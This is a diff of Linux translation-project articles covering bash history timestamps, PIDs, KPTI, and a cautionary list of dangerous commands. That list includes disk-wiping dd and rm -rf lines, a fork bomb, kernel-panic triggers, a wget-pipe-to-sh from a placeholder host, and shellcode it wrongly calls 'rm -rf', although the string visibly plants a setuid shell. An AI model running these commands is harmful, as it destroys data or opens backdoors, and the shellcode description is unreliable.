We all are familiar with History command. It stores/keep all the commands executed by bash in terminal into `.bash_history` file, which will help us to recheck the previously executed commands by user for further investigation.
|
||||
|
||||
By default history command shows only the commands executed by users and it doesn't print the date and time but it logs the time when you ran a command.
|
||||
|
||||
Whenever you run history command, it looks for an environment variable called `HISTTIMEFORMAT`, which tells how to format date & time with history command.
|
||||
|
||||
If the value is null or not set then it will shows default results like how most of the systems shows (Without date and time).
|
||||
|
||||
HISTTIMEFORMAT takes values from strftime (strftime - convert date and time to a string). When you have date and time in history command output, it might help you to track the issue easily.
|
||||
|
||||
* **%T :** Replaced by the time ( %H : %M : %S ).
|
||||
* **%F :** Equivalent to %Y - %m - %d (the ISO 8601:2000 standard date format).
|
||||
|
||||
|
||||
|
||||
See below default history command output.
|
||||
```
|
||||
# history
|
||||
1 yum install -y mysql-server mysql-client
|
||||
2 service mysqld start
|
||||
3 sysdig proc.name=sshd
|
||||
4 sysdig -c topprocs_net
|
||||
5 sysdig proc.name=sshd
|
||||
6 sysdig proc.name=sshd | more
|
||||
7 sysdig fd.name=/var/log/auth.log | more
|
||||
8 sysdig fd.name=/var/log/mysqld.log
|
||||
9 sysdig -cl
|
||||
10 sysdig -i httplog
|
||||
11 sysdig -i proc_exec_time
|
||||
12 sysdig -i topprocs_cpu
|
||||
13 sysdig -c topprocs_cpu
|
||||
14 sysdig -c tracers_2_statsd
|
||||
15 sysdig -c topfiles_bytes
|
||||
16 sysdig -c topprocs_cpu
|
||||
17 sysdig -c topprocs_cpu "fd.name contains sshd"
|
||||
18 sysdig -c topprocs_cpu "proc.name contains sshd"
|
||||
19 csysdig
|
||||
20 sysdig -c topprocs_cpu
|
||||
21 rpm --import https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public
|
||||
22 curl -s -o /etc/yum.repos.d/draios.repo http://download.draios.com/stable/rpm/draios.repo
|
||||
23 yum install -y epel-release
|
||||
24 yum update
|
||||
25 yum makecache
|
||||
26 yum -y install kernel-devel-$(uname -r)
|
||||
27 yum -y install sysdig
|
||||
28 sysdig
|
||||
29 yum install httpd mysql
|
||||
30 service httpd start
|
||||
|
||||
```
|
||||
|
||||
We can set this environment variable in three ways based on our requirements.
|
||||
|
||||
* Temporarily to current user
|
||||
* Permanently to current/other user
|
||||
* Permanently to all users
|
||||
|
||||
|
||||
|
||||
**Note :** Don 't forget to add space before the last single-quotes, otherwise the output would be messy.
|
||||
|
||||
### Method-1 :
|
||||
|
||||
Run the following command to set HISTTIMEFORMAT variable temporarily to current user. This will go away after reboot.
|
||||
```
|
||||
# export HISTTIMEFORMAT='%F %T '
|
||||
|
||||
```
|
||||
|
||||
### Method-2 :
|
||||
|
||||
Append following HISTTIMEFORMAT variable to `.bashrc` or `.bash_profile` file to make it permanent for every user.
|
||||
```
|
||||
# echo 'HISTTIMEFORMAT="%F %T "' >> ~/.bashrc
|
||||
or
|
||||
# echo 'HISTTIMEFORMAT="%F %T "' >> ~/.bash_profile
|
||||
|
||||
```
|
||||
|
||||
Run the following command to to effect the changes made to the file.
|
||||
```
|
||||
# source ~/.bashrc
|
||||
or
|
||||
# source ~/.bash_profile
|
||||
|
||||
```
|
||||
|
||||
### Method-3 :
|
||||
|
||||
Append following HISTTIMEFORMAT variable to `/etc/profile` file to make it permanent to all users.
|
||||
```
|
||||
# echo 'HISTTIMEFORMAT="%F %T "' >> /etc/profile
|
||||
|
||||
```
|
||||
|
||||
Run the following command to to effect the changes made to the file.
|
||||
```
|
||||
# source /etc/profile
|
||||
|
||||
```
|
||||
|
||||
See the sample output.
|
||||
```
|
||||
# history
|
||||
1 2017-08-16 15:30:15 yum install -y mysql-server mysql-client
|
||||
2 2017-08-16 15:30:15 service mysqld start
|
||||
3 2017-08-16 15:30:15 sysdig proc.name=sshd
|
||||
4 2017-08-16 15:30:15 sysdig -c topprocs_net
|
||||
5 2017-08-16 15:30:15 sysdig proc.name=sshd
|
||||
6 2017-08-16 15:30:15 sysdig proc.name=sshd | more
|
||||
7 2017-08-16 15:30:15 sysdig fd.name=/var/log/auth.log | more
|
||||
8 2017-08-16 15:30:15 sysdig fd.name=/var/log/mysqld.log
|
||||
9 2017-08-16 15:30:15 sysdig -cl
|
||||
10 2017-08-16 15:30:15 sysdig -i httplog
|
||||
11 2017-08-16 15:30:15 sysdig -i proc_exec_time
|
||||
12 2017-08-16 15:30:15 sysdig -i topprocs_cpu
|
||||
13 2017-08-16 15:30:15 sysdig -c topprocs_cpu
|
||||
14 2017-08-16 15:30:15 sysdig -c tracers_2_statsd
|
||||
15 2017-08-16 15:30:15 sysdig -c topfiles_bytes
|
||||
16 2017-08-16 15:30:15 sysdig -c topprocs_cpu
|
||||
17 2017-08-16 15:30:15 sysdig -c topprocs_cpu "fd.name contains sshd"
|
||||
18 2017-08-16 15:30:15 sysdig -c topprocs_cpu "proc.name contains sshd"
|
||||
19 2017-08-16 15:30:15 csysdig
|
||||
20 2017-08-16 15:30:15 sysdig -c topprocs_cpu
|
||||
21 2017-08-16 15:30:15 rpm --import https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public
|
||||
22 2017-08-16 15:30:15 curl -s -o /etc/yum.repos.d/draios.repo http://download.draios.com/stable/rpm/draios.repo
|
||||
23 2017-08-16 15:30:15 yum install -y epel-release
|
||||
24 2017-08-16 15:30:15 yum update
|
||||
25 2017-08-16 15:30:15 yum makecache
|
||||
26 2017-08-16 15:30:15 yum -y install kernel-devel-$(uname -r)
|
||||
27 2017-08-16 15:30:15 yum -y install sysdig
|
||||
28 2017-08-16 15:30:15 sysdig
|
||||
29 2017-08-16 15:30:15 yum install httpd mysql
|
||||
30 2017-08-16 15:30:15 service httpd start
|
||||
|
||||
```
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.2daygeek.com/display-date-time-linux-bash-history-command/
|
||||
|
||||
作者:[2daygeek][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.2daygeek.com/author/2daygeek/
|
@ -1,107 +0,0 @@
|
||||
translating---geekpi
|
||||
|
||||
4 Easiest Ways To Find Out Process ID (PID) In Linux
|
||||
======
|
||||
Everybody knows about PID, Exactly what is PID? Why you want PID? What are you going to do using PID? Are you having the same questions on your mind? If so, you are in the right place to get all the details.
|
||||
|
||||
Mainly, we are looking PID to kill an unresponsive program and it's similar to Windows task manager. Linux GUI also offering the same feature but CLI is an efficient way to perform the kill operation.
|
||||
|
||||
### What Is Process ID?
|
||||
|
||||
PID stands for process identification number which is generally used by most operating system kernels such as Linux, Unix, macOS and Windows. It is a unique identification number that is automatically assigned to each process when it is created in an operating system. A process is a running instance of a program.
|
||||
|
||||
**Suggested Read :** [How To Check Apache Web Server Uptime In Linux][1]
|
||||
|
||||
Each time process ID will be getting change to all the processes except init because init is always the first process on the system and is the ancestor of all other processes. It's PID is 1.
|
||||
|
||||
The default maximum value of PIDs is `32,768`. The same has been verified by running the following command on your system `cat /proc/sys/kernel/pid_max`. On 32-bit systems 32768 is the maximum value but we can set to any value up to 2^22 (approximately 4 million) on 64-bit systems.
|
||||
|
||||
You may ask, why we need such amount of PIDs? because we can't reused the PIDs immediately that's why. Also in order to prevent possible errors.
|
||||
|
||||
The PIDs for the running processes on the system can be found by using the pidof command, pgrep command, ps command, and pstree command.
|
||||
|
||||
### Method-1 : Using pidof Command
|
||||
|
||||
pidof used to find the process ID of a running program. It's prints those id's on the standard output. To demonstrate this, we are going to find out the Apache2 process id from Debian 9 (stretch) system.
|
||||
```
|
||||
# pidof apache2
|
||||
3754 2594 2365 2364 2363 2362 2361
|
||||
|
||||
```
|
||||
|
||||
From the above output you may face difficulties to identify the Process ID because it's shows all the PIDs (included Parent and Childs) aginst the process name. Hence we need to find out the parent PID (PPID), which is the one we are looking. It could be the first number. In my case it's `3754` and it's shorted in descending order.
|
||||
|
||||
### Method-2 : Using pgrep Command
|
||||
|
||||
pgrep looks through the currently running processes and lists the process IDs which match the selection criteria to stdout.
|
||||
```
|
||||
# pgrep apache2
|
||||
2361
|
||||
2362
|
||||
2363
|
||||
2364
|
||||
2365
|
||||
2594
|
||||
3754
|
||||
|
||||
```
|
||||
|
||||
This also similar to the above output but it's shorting the results in ascending order, which clearly says that the parent PID is the last one. In my case it's `3754`.
|
||||
|
||||
**Note :** If you have more than one process id of the process, you may face trouble to identify the parent process id when using pidof & pgrep command.
|
||||
|
||||
### Method-3 : Using pstree Command
|
||||
|
||||
pstree shows running processes as a tree. The tree is rooted at either pid or init if pid is omitted. If a user name is specified in the pstree command then it's shows all the process owned by the corresponding user.
|
||||
|
||||
pstree visually merges identical branches by putting them in square brackets and prefixing them with the repetition count.
|
||||
```
|
||||
# pstree -p | grep "apache2"
|
||||
|- apache2(3754) -|-apache2(2361)
|
||||
| |-apache2(2362)
|
||||
| |-apache2(2363)
|
||||
| |-apache2(2364)
|
||||
| |-apache2(2365)
|
||||
| `-apache2(2594)
|
||||
|
||||
```
|
||||
|
||||
To get parent process alone, use the following format.
|
||||
```
|
||||
# pstree -p | grep "apache2" | head -1
|
||||
|- apache2(3754) -|-apache2(2361)
|
||||
|
||||
```
|
||||
|
||||
pstree command is very simple because it's segregating the Parent and Child processes separately but it's not easy when using pidof & pgrep command.
|
||||
|
||||
### Method-4 : Using ps Command
|
||||
|
||||
ps displays information about a selection of the active processes. It displays the process ID (pid=PID), the terminal associated with the process (tname=TTY), the cumulated CPU time in [DD-]hh:mm:ss format (time=TIME), and the executable name (ucmd=CMD). Output is unsorted by default.
|
||||
```
|
||||
# ps aux | grep "apache2"
|
||||
www-data 2361 0.0 0.4 302652 9732 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2362 0.0 0.4 302652 9732 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2363 0.0 0.4 302652 9732 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2364 0.0 0.4 302652 9732 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2365 0.0 0.4 302652 8400 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2594 0.0 0.4 302652 8400 ? S 06:55 0:00 /usr/sbin/apache2 -k start
|
||||
root 3754 0.0 1.4 302580 29324 ? Ss Dec11 0:23 /usr/sbin/apache2 -k start
|
||||
root 5648 0.0 0.0 12784 940 pts/0 S+ 21:32 0:00 grep apache2
|
||||
|
||||
```
|
||||
|
||||
From the above output we can easily identify the parent process id (PPID) based on the process start date. In my case apache2 process was started @ `Dec11` which is the parent and others are child's. PID of apache2 is `3754`.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.2daygeek.com/how-to-check-find-the-process-id-pid-ppid-of-a-running-program-in-linux/
|
||||
|
||||
作者:[Magesh Maruthamuthu][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.2daygeek.com/author/magesh/
|
||||
[1]:https://www.2daygeek.com/check-find-apache-httpd-web-server-uptime-linux/
|
@ -1,185 +0,0 @@
|
||||
translating by CYLeft
|
||||
|
||||
The Linux commands you should NEVER use
|
||||
======
|
||||
Unless, of course, you like killing your machines.
|
||||
|
||||
Spider-Man's credo is, "With great power comes great responsibility." That's also a wise attitude for Linux system administrators to adopt.
|
||||
|
||||
No! Really! Thanks to DevOps and cloud orchestration, a Linux admin can control not merely a single server, but tens of thousands of server instances. With one stupid move--like [not patching Apache Struts][1]--you can wreck a multibillion-dollar enterprise.
|
||||
|
||||
Failing to stay on top of security patches is a strategic business problem that goes way above the pay grade of a system administrator. But there are many simple ways to blow up Linux servers, which do lie in the hands of sysadmins. It would be nice to imagine that only newbies make these mistakes--but we know better.
|
||||
|
||||
Here are infamous commands that enable anyone with root access to wreak havoc.
|
||||
|
||||
A word of caution: Never, ever run any of these on a production system. They will harm your system. Don't try this at home! Don't try it at the office, either.
|
||||
|
||||
That said, onward!
|
||||
|
||||
### rm -rf /
|
||||
|
||||
Want to ruin a Linux system in no time flat? You can't beat this classic "worst command ever." It deletes everything--and I mean everything--from your system.
|
||||
|
||||
Like most of these [Linux commands][2], the core program, `rm`, is very handy. It enables you to delete even the most stubborn files. But you're in deep trouble when you combine `rm` with those two flags: `-r`, which forces recursive deletion through all subdirectories, and `-f`, which forces deletion of read-only files without confirmation. If you run it from the / root directory, you'll wipe every last bit of data on your entire drive.
|
||||
|
||||
Just imagine trying to explain that to the boss!
|
||||
|
||||
Now, you might think, "I could never make such a dumb mistake." Oh, my friend, pride goes before a fall. Consider [this cautionary tale from a sysadmin on Reddit][3]:
|
||||
|
||||
> I've been in IT a long time, but today, in Linux, as root, I `rm -r` the wrong path.
|
||||
>
|
||||
> Long story short, I had to copy a bunch of dirs from one path to another and, as you do, I did a couple of `cp -R` to copy the needed about.
|
||||
>
|
||||
> In my wisdom, I tapped the up arrow a couple of times as the dirs to copy are similarly named but they're in amongst a whole bunch of other stuff.
|
||||
>
|
||||
> Anyway, I tapped too far and being distracted as I typed on Skype and Slack and WhatsApp web as well as taking a call from Sage, my brained auto-piloted in: `rm -R ./videodir/* ../companyvideodirwith651vidsin/`
|
||||
|
||||
And there went corporate video file after file into the void. Fortunately, after much frantic pounding of `control-C`, the sysadmin managed to stop the command before it deleted too many files. But let this be a warning to you: Anyone can make this mistake.
|
||||
|
||||
True, most modern systems warn you in great big letters before you make this blunder. However, if you are busy or distracted as you pound away on the keyboard, you can type your system into a black hole.
|
||||
|
||||
There are sneakier ways to get rm -rf. Consider the code below:
|
||||
|
||||
`char esp[] __attribute__ ((section(".text"))) = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"`
|
||||
|
||||
`"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"`
|
||||
|
||||
`"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"`
|
||||
|
||||
`"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"`
|
||||
|
||||
`"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"`
|
||||
|
||||
`"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"`
|
||||
|
||||
`"\x6e\x2f\x73\x68\x00\x2d\x63\x00"`
|
||||
|
||||
`"cp -p /bin/sh /tmp/.beyond; chmod 4755`
|
||||
|
||||
`/tmp/.beyond;";`
|
||||
|
||||
What is it? It's the hex version of `rm -rf`. Don't run any command unless you know what it is.
|
||||
|
||||
### Bash fork bomb
|
||||
|
||||
Since we are on the topic of odd-looking code, consider this line:
|
||||
```
|
||||
:(){ :|: & };:
|
||||
```
|
||||
|
||||
It may look cryptic to you, but to me, it looks like the infamous [Bash fork bomb][4]. All it does is start new Bash shells, over and over again, until all your system resources are consumed and the system crashes.
|
||||
|
||||
An up-to-date Linux system shouldn't do this. Note, I said shouldn't. I didn't say won't. Properly set up, Linux systems block this behavior from causing too much harm by setting user limits. Usually, users are restricted to allocate only the memory that the machine has available. But if you run the above (or some other [Bash fork bomb variants][5]) as root, you can still knock a server off until it's rebooted.
|
||||
|
||||
### Overwriting the hard drive with garbage
|
||||
|
||||
There are times you want to zap the data from a disk, but for that job, you should use a tool such as [Darik's Boot and Nuke (DBAN)][6].
|
||||
|
||||
But for just making a royal mess of your storage, it's hard to beat running:
|
||||
```
|
||||
Any command > /dev/hda
|
||||
```
|
||||
|
||||
When I say "any command," I mean any command with output. For example:
|
||||
```
|
||||
ls -la > /dev/hda
|
||||
```
|
||||
|
||||
…pipes the directory listing to your main storage device. Given time, and root privileges, this overwrites all the data on your drive. That's always a good way to start the day in a blind panic--or turn it into a [career-limiting crisis][7].
|
||||
|
||||
### Wipe that drive!
|
||||
|
||||
Another all-time favorite way to smoke storage is to run:
|
||||
```
|
||||
dd if=/dev/zero of=/dev/hda
|
||||
```
|
||||
|
||||
With this command, you're writing data to a drive. The `dd` command pulls its data from the special file, which outputs an infinity of zeros, and pours those zeros all over the hard drive.
|
||||
|
||||
Now /dev/zero may sound like a really silly idea, but it has real uses. For example, you can use it to [clear unused space in a partition with zeros][8]. This makes compressing an image of the partition much smaller for data transfer or archival uses.
|
||||
|
||||
On the other hand, its close relative, `dd if=/dev/random of=/dev/hda`, isn't good for much except ruining your day. If you ran this command (please don't), you would cover your storage with random crap. As a half-assed way to hide your secret plans to take over the office coffee machine, it's not bad, but DBAN is a better tool for that job.
|
||||
|
||||
### /dev/null for the loss
|
||||
|
||||
Perhaps it's because our data is precious to us and our confidence in backups is minimal, but many of these "Never do this!" Linux commands have the result of wiping a hard disk or other storage repository. Case in point: Another pair of ways to ruin your storage is to run `mv / /dev/null` or `>mv ` /dev/null`.
|
||||
|
||||
In the former case, you as the root user are sending all the drive's data into the ever-hungry maw of `/dev/null`. In the latter, you're just feeding your home directory into the same vault of emptiness. In either case, short of restoring from a backup, you won't be seeing any of that data ever again.
|
||||
|
||||
When it comes to containers, don't forget data persistence or data storage. 451 Research offers advice.
|
||||
|
||||
[Get the report][9]
|
||||
|
||||
Heck, accounting didn't really need up-to-date receivables files anyway, did they?
|
||||
|
||||
### Formatting the wrong drive
|
||||
|
||||
Sometimes you must format a drive with a command like:
|
||||
```
|
||||
mkfs.ext3 /dev/hda
|
||||
```
|
||||
|
||||
…which formats the primary hard drive with the ext3 file system. But, wait one darn second! What are you doing formatting your main drive! Aren't you using it?
|
||||
|
||||
Make doubly sure when you're formatting drives--be they solid state, flash, or good old ferrous oxide--that you're formatting the partition that really needs it and not one that's already in use.
|
||||
|
||||
### Kernel panics
|
||||
|
||||
Some Linux commands do not put your machine down for the long count. However, a variety of them can cause the kernel to panic. Normally, these failures are caused by hardware issues, but you can do it to yourself.
|
||||
|
||||
When you encounter a kernel panic, you need to reboot the system to get back to work. In some cases, that's a mild annoyance; in others--such as a production system under heavy load--it's a big deal. Examples include:
|
||||
```
|
||||
dd if=/dev/random of=/dev/port
|
||||
|
||||
echo 1 > /proc/sys/kernel/panic
|
||||
|
||||
cat /dev/port
|
||||
|
||||
cat /dev/zero > /dev/mem
|
||||
```
|
||||
|
||||
All of these cause kernel panics.
|
||||
|
||||
Never run a command unless you know what it's supposed to do, which reminds me…
|
||||
|
||||
### Be wary of unknown scripts
|
||||
|
||||
Young or lazy sysadmins like to borrow scripts written by other people. Why reinvent the wheel, right? So, they find a cool script that promises to automate and check all backups. They grab it with a command such as:
|
||||
```
|
||||
wget https://ImSureThisIsASafe/GreatScript.sh -O- | sh
|
||||
```
|
||||
|
||||
This downloads the script and then shoots it over to the shell to run. No fuss, no muss, right? Wrong. That script may be poisoned with malware. Sure, Linux is safer than most operating systems by default, but if you run unknown code as root, anything can happen. The danger is not only in maliciousness; the script author's stupidity is equally as harmful. You can be bitten by someone else's undebugged code--because you didn't take the time to even read it through.
|
||||
|
||||
You'd never do something like that? Tell me, all those [container images you're running on Docker][10]? Do you know what they're really running? I know too many sysadmins who run containers without verifying what's really in them. Don't be like them.
|
||||
|
||||
### Shutdown
|
||||
|
||||
The moral of these stories is simple. With Linux, you get an enormous amount of control over your system. You can make your servers do almost anything. But you must make certain that you use that power conscientiously. If you don't, you can wreck not just your servers, but your job and your company. Be like Spider-Man, and use your power responsibly.
|
||||
|
||||
Did I miss any? Tweet me at [@sjvn][11] and [@enterprisenxt][12] to tell me which Linux commands are on your "[Never use this!][13]" list.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.hpe.com/us/en/insights/articles/the-linux-commands-you-should-never-use-1712.html
|
||||
|
||||
作者:[Steven Vaughan-Nichols][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.hpe.com/us/en/insights/contributors/steven-j-vaughan-nichols.html
|
||||
[1]:http://www.zdnet.com/article/equifax-blames-open-source-software-for-its-record-breaking-security-breach/
|
||||
[2]:https://www.hpe.com/us/en/insights/articles/16-linux-server-monitoring-commands-you-really-need-to-know-1703.html
|
||||
[3]:https://www.reddit.com/r/sysadmin/comments/732skq/after_21_years_i_finally_made_the_rm_boo_boo/
|
||||
[4]:https://www.cyberciti.biz/faq/understanding-bash-fork-bomb/
|
||||
[5]:https://unix.stackexchange.com/questions/283496/why-do-these-bash-fork-bombs-work-differently-and-what-is-the-significance-of
|
||||
[6]:https://dban.org/
|
||||
[7]:https://www.hpe.com/us/en/insights/articles/13-ways-to-tank-your-it-career-1707.html
|
||||
[8]:https://unix.stackexchange.com/questions/44234/clear-unused-space-with-zeros-ext3-ext4
|
||||
[9]:https://www.hpe.com/us/en/resources/solutions/enterprise-devops-containers.html?jumpid=in_insights~510287587~451_containers~badLinux
|
||||
[10]:https://www.oreilly.com/ideas/five-security-concerns-when-using-docker
|
||||
[11]:http://www.twitter.com/sjvn
|
||||
[12]:http://www.twitter.com/enterprisenxt
|
||||
[13]:https://www.youtube.com/watch?v=v79fYnuVzdI
|
@ -1,54 +0,0 @@
|
||||
Translating by qhwdw The current state of kernel page-table isolation
|
||||
============================================================
|
||||
|
||||
At the end of October, the [KAISER][8] patch set was unveiled; this work separates the page tables used by the kernel from those belonging to user space in an attempt to address x86 processor bugs that can disclose the layout of the kernel to an attacker. Those patches have seen significant work in the weeks since their debut, but they appear to be approaching a final state. It seems like an appropriate time for another look.
|
||||
|
||||
This work has since been renamed to "kernel page-table isolation" or KPTI, but the objective remains the same: split the page tables, which are currently shared between user and kernel space, into two sets of tables, one for each side. This is a fundamental change to how the kernel's memory management works and is the sort of thing that one would ordinarily expect to see debated for years, especially given its associated performance impact. KPTI remains on the fast track, though. [A set of preparatory patches][2] was merged into the mainline after the 4.15-rc4 release — when only important fixes would ordinarily be allowed — and the rest seems destined for the 4.16 merge window. Many of the core kernel developers have clearly put a lot of time into this work, and Linus Torvalds is [expecting][3] it to be backported to the long-term stable kernels.
|
||||
|
||||
KPTI, in other words, has all the markings of a security patch being readied under pressure from a deadline. Just in case there are any smug ARM-based readers out there, it's worth noting that there is [an equivalent patch set for arm64][4] in the works.
|
||||
|
||||
#### 51 Patches and counting
|
||||
|
||||
As of this writing, the x86 patch series is at [version 163][5]. It contains 51 patches, so we can all be grateful that most of the intervening versions were not posted publicly. The initial patch set, posted by Dave Hansen, has been extensively reworked by Thomas Gleixner, Peter Zijlstra, Andy Lutomirski, and Hugh Dickins, with suggestions from many others. Any bugs that remain in this work won't be there as the result of a lack of experienced eyeballs on the code.
|
||||
|
||||
Page tables on contemporary systems are organized in a tree-like structure that makes for efficient storage of a sparse memory map and supports the huge pages feature; see [this 2005 article][6] for more details and a diagram of how it works. On a system with four levels of page tables (most largish systems, these days), the top level is the page global directory (PGD). Below that come the page upper directory (PUD), page middle directory (PMD), and page-table entries (PTE). Systems with five-level page tables insert a level (called the P4D) just below the PGD.
|
||||
|
||||
Page-fault resolution normally traverses this entire tree to find the PTE of interest, but huge pages can be represented by special entries at the higher levels. For example, a 2MB chunk of memory could be represented by either a single huge-page entry at the PMD level or a full page of single-page PTE entries.
|
||||
|
||||
In current kernels, each process has a single PGD; one of the first steps taken in the KPTI patch series is to create a second PGD. The original remains in use when the kernel is running; it maps the full address space. The second is made active (at the end of the patch series) when the process is running in user space. It points to the same directory hierarchy for pages belonging to the process itself, but the portion describing kernel space (which sits at the high end of the virtual address space) is mostly absent.
|
||||
|
||||
Page-table entries contain permission bits describing how the memory they describe can be accessed; these bits are, naturally, set to prevent user space from accessing kernel pages, even though those pages are mapped into the address space. Unfortunately, a number of hardware-level bugs allow a user-space attacker to determine whether a given kernel-space address is mapped or not, regardless of whether any page mapped at that address is accessible. That information can be used to defeat kernel address-space layout randomization, making life much easier for a local attacker. The core idea behind KPTI is that switching to a PGD lacking a kernel-space mapping will defeat attacks based on these vulnerabilities, of which we have apparently not yet seen the last.
|
||||
|
||||
#### Details
|
||||
|
||||
The idea is simple but, as is so often the case, there are a number of troublesome details that turn a simple idea into a 51-part patch series. The first of those is that, if the processor responds to a hardware interrupt while running in user mode, the kernel code needed to deal with the interrupt will no longer exist in the address space. So there must be enough kernel code mapped in user mode to switch back to the kernel PGD and make the rest available. A similar situation exists for traps, non-maskable interrupts, and system calls. This code is small and can be isolated from the rest, but there are a number of tricky details involved in handling that switch safely and efficiently.
|
||||
|
||||
Another complication comes in the form of the x86 local descriptor table (LDT), which can be used to change how the user-space memory layout looks. It can be tweaked with the little-known [`modify_ldt()`][7] system call. The early POSIX threads implementation on Linux used the LDT to create a thread-local storage area, for example. On current Linux systems, the LDT is almost unused but some applications (Wine, for example) still need it. When it is used, the LDT must be available to both kernel and user space, but it must live in kernel space. The KPTI patch set shuffles kernel memory around to reserve an entire entry at the PGD level for the LDT; the space available for `vmalloc()` calls shrinks to a mere 12,800TB as a result. That allows space for a large number of LDTs, needed on systems with many CPUs. One result of this change is that the location of the LDT is fixed and known to user space — a potential problem, since the ability to overwrite the LDT is easily exploited to compromise the system as a whole. The final patch in the series maps the LDT read-only in an attempt to head off any such attacks.
|
||||
|
||||
Another potential vulnerability comes about if the kernel can ever be manipulated into returning to user space without switching back to the sanitized PGD. Since the kernel-space PGD also maps user-space memory, such an omission could go unnoticed for some time. The response here is to map the user-space portion of the virtual address space as non-executable in the kernel PGD. Should user space ever start running with the wrong page tables, it will immediately crash as a result.
|
||||
|
||||
Finally, while all existing x86 processors are seemingly affected by information-disclosure vulnerabilities, future processors may not be. KPTI comes with a measurable run-time cost, estimated at about 5%. That is a cost that some users may not want to pay, especially once they get newer processors that lack these problems. There will be a `nopti`command-line option to disable this mechanism at boot time. The patch series also adds a new "feature" flag (`X86_BUG_CPU_INSECURE`) to indicate vulnerable CPUs; it is set on all x86 CPUs currently, but might not be on future hardware. In the absence of this feature flag, page-table isolation will automatically be turned off.
|
||||
|
||||
Approximately one month remains before the opening of the 4.16 merge window. During that time, the KPTI patch set will undoubtedly go through a number of additional revisions as the inevitable glitches come to light. Once things settle down, though, it would appear that this code will be merged and backported to stable kernels in a relative hurry. Apparently, we can look forward to slower — but more secure — kernels as a new-year's present.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://lwn.net/SubscriberLink/741878/eb6c9d3913d7cb2b/
|
||||
|
||||
作者:[Jonathan Corbet ][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://lwn.net/SubscriberLink/741878/eb6c9d3913d7cb2b/
|
||||
[1]:https://lwn.net/Promo/slink-trial2-2/claim
|
||||
[2]:https://git.kernel.org/linus/64a48099b3b31568ac45716b7fafcb74a0c2fcfe
|
||||
[3]:https://lwn.net/Articles/741882/
|
||||
[4]:https://lwn.net/Articles/740393/
|
||||
[5]:https://lwn.net/Articles/741883/
|
||||
[6]:https://lwn.net/Articles/117749/
|
||||
[7]:http://man7.org/linux/man-pages/man2/modify_ldt.2.html
|
||||
[8]:https://lwn.net/Articles/738975/
|
||||
|
||||
|
@ -1,3 +1,5 @@
|
||||
translating----geekpi
|
||||
|
||||
What Is A Web Crawler? How Web Crawlers work?
|
||||
======
|
||||

|
||||
|
@ -1,3 +1,4 @@
|
||||
Translating by qhwdw
|
||||
# [The mysterious case of the Linux Page Table Isolation patches][14]
|
||||
|
||||
* * *
|
||||
@ -135,3 +136,5 @@ via: http://pythonsweetness.tumblr.com/post/169166980422/the-mysterious-case-of-
|
||||
[13]:http://t.umblr.com/redirect?z=https%3A%2F%2Farxiv.org%2Fabs%2F1710.00551&t=ZjAyMDUzZWRmYjExNGNlYzRlMjE1NTliMTI2M2Y4YjkxMTFhMjI0OCxXRG55eVpXNw%3D%3D&b=t%3AqBH2b-yWL63V8acbuG-EUQ&p=http%3A%2F%2Fpythonsweetness.tumblr.com%2Fpost%2F169166980422%2Fthe-mysterious-case-of-the-linux-page-table&m=1
|
||||
[14]:http://pythonsweetness.tumblr.com/post/169166980422/the-mysterious-case-of-the-linux-page-table
|
||||
[15]:http://pythonsweetness.tumblr.com/
|
||||
|
||||
|
||||
|
@ -0,0 +1,103 @@
|
||||
translating by lujun9972
|
||||
Linux uptime Command Explained for Beginners with Examples
|
||||
======
|
||||
|
||||
If you are a Linux newbie, and have interest in system administration, or you want to become a power user, then you need to have a solid knowledge of the command line. There are several commands that you should know about, and one of them is **uptime**. In this article, we will discuss the basics of this command using some easy to understand examples.
|
||||
|
||||
But before that, it's worth mentioning that all examples used in this tutorial have been tested on an Ubuntu 16.04 machine.
|
||||
|
||||
## Linux uptime command
|
||||
|
||||
As the name suggests, the uptime command gives you the time for which the system has been up (or running). Here's its syntax:
|
||||
|
||||
```
|
||||
uptime [options]
|
||||
```
|
||||
|
||||
And here's is the way the tool's man page explains it:
|
||||
```
|
||||
uptime gives a one line display of the following information. The current time, how long the system
|
||||
has been running, how many users are currently logged on, and the system load averages for the past
|
||||
1, 5, and 15 minutes.
|
||||
```
|
||||
|
||||
The following Q&A-styled examples should give you a better idea on how the uptime command works.
|
||||
|
||||
### Q1. How to use the uptime command
|
||||
|
||||
